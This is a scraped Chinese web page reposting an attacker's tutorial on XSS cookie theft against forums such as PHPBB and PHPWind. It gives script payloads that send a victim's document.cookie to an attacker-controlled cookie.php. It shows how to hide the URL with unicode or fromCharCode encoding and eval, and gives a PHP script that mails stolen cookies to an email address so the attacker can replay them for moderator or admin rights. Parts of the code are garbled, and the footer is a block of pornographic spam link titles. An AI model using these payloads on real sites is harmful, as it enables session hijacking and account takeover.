<span id="mktg5"></span>

<i id="mktg5"><meter id="mktg5"></meter></i>

        <label id="mktg5"><meter id="mktg5"></meter></label>
        最新文章專題視頻專題問答1問答10問答100問答1000問答2000關鍵字專題1關鍵字專題50關鍵字專題500關鍵字專題1500TAG最新視頻文章推薦1 推薦3 推薦5 推薦7 推薦9 推薦11 推薦13 推薦15 推薦17 推薦19 推薦21 推薦23 推薦25 推薦27 推薦29 推薦31 推薦33 推薦35 推薦37視頻文章20視頻文章30視頻文章40視頻文章50視頻文章60 視頻文章70視頻文章80視頻文章90視頻文章100視頻文章120視頻文章140 視頻2關鍵字專題關鍵字專題tag2tag3文章專題文章專題2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章專題3
        問答文章1 問答文章501 問答文章1001 問答文章1501 問答文章2001 問答文章2501 問答文章3001 問答文章3501 問答文章4001 問答文章4501 問答文章5001 問答文章5501 問答文章6001 問答文章6501 問答文章7001 問答文章7501 問答文章8001 問答文章8501 問答文章9001 問答文章9501
        當前位置: 首頁 - 科技 - 知識百科 - 正文

        XSS攻擊Cookie欺騙中隱藏JavaScript執行

        來源:懂視網 責編:小采 時間:2020-11-27 20:31:22
        文檔

        XSS攻擊Cookie欺騙中隱藏JavaScript執行

        XSS攻擊Cookie欺騙中隱藏JavaScript執行:比如發現一處可XSS地方:<script>alert(不管怎么樣彈出就好)</script>自己弄個偷cookie的文件。目的是讓其他瀏覽者去瀏覽我們設計好的陷阱<script>document.location=http://URL.com/cookie.phpcooki
        推薦度:
        導讀XSS攻擊Cookie欺騙中隱藏JavaScript執行:比如發現一處可XSS地方:<script>alert(不管怎么樣彈出就好)</script>自己弄個偷cookie的文件。目的是讓其他瀏覽者去瀏覽我們設計好的陷阱<script>document.location=http://URL.com/cookie.phpcooki

        比如發現一處可XSS地方:
        <script>alert(不管怎么樣彈出就好)</script>

        自己弄個偷cookie的文件。

        目的是讓其他瀏覽者去瀏覽我們設計好的陷阱
        <script>document.location=http://URL.com/cookie.php?cookie='+escape(document.cookie) </script>

        怎么弄其實也不用我多說了。

        現在主要說的是如何隱藏JavaScript執行。

        大家可能習慣每天去milw0rm.com看EXP,

        每當發布XSS漏洞的EXP,當我們利用的時候。

        卻無法cookie任何信息,這是為什么呢。

        像魔力,PHPBB這樣大型的論壇都具備XSS漏洞。

        我給的這個
        <script>document.location=http://URL.com/cookie.php?cookie='+escape(document.cookie) </script>

        會顯示Javascript 錯誤。

        解決辦法有2種,我們可以把外部敏感信息用unicode編碼

        給個URL:http://www.mikezilla.com/exp0012.html

        通過編碼就是這樣:
        <script>eval(location.href="http://www.php1.cn/">
        上述還不行就用第2種方法

        Javascript fromCharCode中的eval功能

        上面說了可以用unicode編碼過一些站

        比如編碼后的104,116,116,112就是HTTP

        如果論壇用了其他的編輯器,比如PHPWind 用的所見所得編輯器

        直接打上http://url.com肯定會暴露。

        那么我們就看編輯器的形式來調換URL

        比如偷COOKIE的站是http://www.URL.com

        我們就這樣
        http://www.url.com

        當然顯示的部分你可以替換成吸引人的信息騙取管理和斑竹的點擊

        用一點社會工程學就可以了。

        好了現在都完成了初步的設想,開始實現吧

        第1步:管理看見我們構造好的陷阱,并且點了他

        第2步:Javascript 執行成功了。。

        第3步:構造好的偷COOKIE文件偷取到Cookie

        第4步:我們不可能傻到URL連接是純文本,將URL用Unicode編碼(這里習慣說是加密)http://www.mikezilla.com/exp0012.html

        第5步:截取的Cookie信息當然不是明文的,我們只要使用FireFox Cookie 編輯器
        替換COOKIE就OK了,或者用CookieEditor等其他工具。

        個人建議:偷取Cookie不一定就使用空間收取Cookie信息
        比如構造個郵箱收取就這樣
        <?

        mail("hackeroo@hotmail.com","cookie monster",$_REQUEST[cookie]);

        ?>
        <html>
        <script>document.location=http://www.URL.com/'</script>
        </html>

        好了偷到有價值的信息替換Cookie就行了。替換斑竹的就是斑竹權限,替換管理的就和是管理權限。

        聲明:本網頁內容旨在傳播知識,若有侵權等問題請及時與本網聯系,我們將在第一時間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com

        文檔

        XSS攻擊Cookie欺騙中隱藏JavaScript執行

        XSS攻擊Cookie欺騙中隱藏JavaScript執行:比如發現一處可XSS地方:<script>alert(不管怎么樣彈出就好)</script>自己弄個偷cookie的文件。目的是讓其他瀏覽者去瀏覽我們設計好的陷阱<script>document.location=http://URL.com/cookie.phpcooki
        推薦度:
        • 熱門焦點

        最新推薦

        猜你喜歡

        熱門推薦

        專題
        Top
        主站蜘蛛池模板: 夫妻免费无码V看片| 日韩在线永久免费播放| 日韩特黄特色大片免费视频| 337p欧洲亚洲大胆艺术| 国产精品免费大片| 亚洲AV无码欧洲AV无码网站| 国产在线观看免费视频软件| 亚洲AV区无码字幕中文色| 一级毛片免费播放| 亚洲短视频在线观看| 成年免费大片黄在线观看岛国| 国产亚洲国产bv网站在线| 成人毛片免费在线观看| 亚洲精品乱码久久久久久蜜桃图片| 国产精品免费观看久久| 人人狠狠综合久久亚洲| 亚洲男人在线无码视频| 在线涩涩免费观看国产精品| 亚洲黄色在线视频| 最近免费中文字幕4| 午夜肉伦伦影院久久精品免费看国产一区二区三区 | 成人片黄网站色大片免费观看APP| 国产亚洲成av人片在线观看| 久久青草精品38国产免费| va天堂va亚洲va影视中文字幕| 国产真实伦在线视频免费观看| 一级毛片免费在线观看网站| 亚洲AV无码久久精品狠狠爱浪潮| 69av免费观看| 精品亚洲成A人在线观看青青| 亚洲精品无码专区久久久 | 国产精品深夜福利免费观看 | 国产精品亚洲不卡一区二区三区| 日本一道本不卡免费| 精品久久久久久亚洲精品| 免费国产不卡午夜福在线| 国产精品免费大片| 国产精品亚洲天堂| 亚洲五月六月丁香激情| 亚洲第一成人影院| 亚洲网站免费观看|